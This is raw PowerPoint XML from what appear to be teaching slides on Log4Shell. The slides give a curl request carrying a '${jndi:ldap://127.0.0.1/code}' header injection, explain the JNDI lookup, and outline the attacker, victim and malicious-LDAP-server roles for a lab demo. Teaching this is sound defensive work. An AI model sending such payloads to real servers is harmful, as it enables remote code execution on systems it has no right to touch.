          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>indicates variable interpolation. It's trying to trick the victim server into interpreting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Arrow Connector 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3868316A-70DE-4C74-D0EA-988151372C4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7791938" y="4541688"/>
            <a:ext cx="0" cy="25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935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24C7-626E-0FC9-0857-74E6C734CEDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>An HTTP request example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0D5E9EE-AF3B-97A7-F65B-7100CBA0A89C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="1058252"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Attackers manipulate an HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>request and inject malicious LDAP queries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>sent to an LDAP server. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C419B23-DE17-334B-7E88-8FD6D5E5229C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="961292" y="3585308"/>
            <a:ext cx="10120924" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="393A34"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="36ACAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="36ACAA"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7.0.0.1:8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="393A34"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -H </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X-Api-Version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://127.0.0.1/code}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADFAAB13-B34B-C299-BDD6-CD1CC11A338F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4456474"/>
            <a:ext cx="10167816" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" err="1">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://127.0.0.1/code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>is a string that resembles a JNDI (Java Naming and Directory Interface) URL pointing to an LDAP server at 127.0.0.1 (which is the local machine) with a path of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>indicates variable interpolation,. It's trying to trick the victim server into interpreting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://127.0.0.1/code} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>as a malicious code to execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195415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CB6A31-098F-0147-5072-D1CD409A82B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024113" y="0"/>
            <a:ext cx="10143774" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25BDA276-60B9-0528-B5DF-5AB00142DA0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5478584" y="93786"/>
            <a:ext cx="5524269" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="007DB5"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Put all the pieces together!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419056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3812-65CD-7F62-C731-BCFC6FBABFCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Log4Shell Attack Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ECB4E53-792B-F3FD-2DC6-A26225943835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>based on https://github.com/christophetd/log4shell-vulnerable-app</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4046561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67280-A1E2-E76D-1748-7D874596A828}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Attack infrastructure requirements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E54C6D1-F47B-B21B-4C24-5169637C1608}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Three roles and each role is associated with a machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Victim: a web server with a vulnerable app with Log4J invulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Attacker: with an attack machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Attacker-controlled JDNI server: for hosting malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57285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erver Icon Vector Sign and Symbol Isolated on White Background Stock  Vector - Illustration of symbol, global: 133803763">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBBF8A1F-2206-743F-2A8B-A95AB86D22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30" t="15124" r="13765" b="14963"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6948408" y="3082384"/>
            <a:ext cx="1767368" cy="16925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server Vector Icons free download in SVG, PNG Format">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBC0B58A-19E6-8814-CA04-193AAF8723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24" t="4655" r="7546" b="9761"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2451400" y="4632822"/>
            <a:ext cx="1650087" cy="1715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774299-AC49-52F1-E83A-1F79B84E9282}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Interactions between each role </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1032" name="Picture 8" descr="Attacker Images – Browse 81,381 Stock Photos, Vectors, and Video | Adobe  Stock">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E90D55ED-B80E-4F88-076A-CD6F66AAA5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91" t="12696" r="20402" b="12411"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2573512" y="1879412"/>
            <a:ext cx="1333494" cy="16925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99A620-6D40-B018-CE88-653DB6F23F7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7265099" y="4263181"/>
            <a:ext cx="987947" cy="397778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11E367CF-7107-13D6-FDCC-D0C5D9840F77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2145742" y="1367522"/>
            <a:ext cx="2276585" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>136.160.215.12/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>127.0.0.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1CB4FA0-B208-9539-4873-03F55A00E471}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2117259" y="4406000"/>
            <a:ext cx="2137124" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>136.160.215.13</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="Linux - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B840082-2704-503A-456D-002C6BA66E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779041" y="1466817"/>
            <a:ext cx="440155" cy="5215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2B9FA8C6-8E9A-B4F8-F741-A8EA8535E5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4694" y="4426566"/>
            <a:ext cx="517837" cy="456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ux - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49CF214E-4F73-9779-1164-B3E1981EA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129713" y="3466246"/>
            <a:ext cx="440155" cy="5215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ocker - Crunchbase Company Profile &amp; Funding">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FF93EB4-E8A6-64F9-C572-6AD42B8CBB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05031" y="4061548"/>
            <a:ext cx="723755" cy="619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LDAP, JXplorer and Java - An introductory LDAP tutorial - Symbiotics">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{578ACCB4-1AA9-1EDA-AD08-206C0C629A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9819" y="4947525"/>
            <a:ext cx="715582" cy="7155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C38BA87-A7F0-F2E4-739A-949CEF21502C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6744652" y="6492875"/>
            <a:ext cx="4884640" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>https://github.com/christophetd/log4shell-vulnerable-app</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FDD7FE6-6421-A661-935C-5AF6F52C617C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6809344" y="2248409"/>
            <a:ext cx="2172503" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Web Server: vulnerable-app</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1040" name="Picture 16" descr="Payload - Free security icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C4556D-4237-DD70-EED8-E6B60D2824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264" y="5650446"/>
            <a:ext cx="492271" cy="49227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C6D96C4E-08D3-214C-437D-EBC03326DE9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1032" idx="2"/>
            <a:endCxn id="5" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3185821" y="3571924"/>
            <a:ext cx="54438" cy="8340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85CEB8-D50C-CCD1-1786-25B00DFE0FCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4254498" y="2758842"/>
            <a:ext cx="1738185" cy="77204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CCF361-6E38-594D-1C73-A4EE72C8F79D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4124270" y="4680804"/>
            <a:ext cx="1865883" cy="81310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62B978-9EDC-1B23-3786-94547B474061}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4422327" y="5049700"/>
            <a:ext cx="1707386" cy="79205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16" descr="Payload - Free security icons">
            <a:extLst>
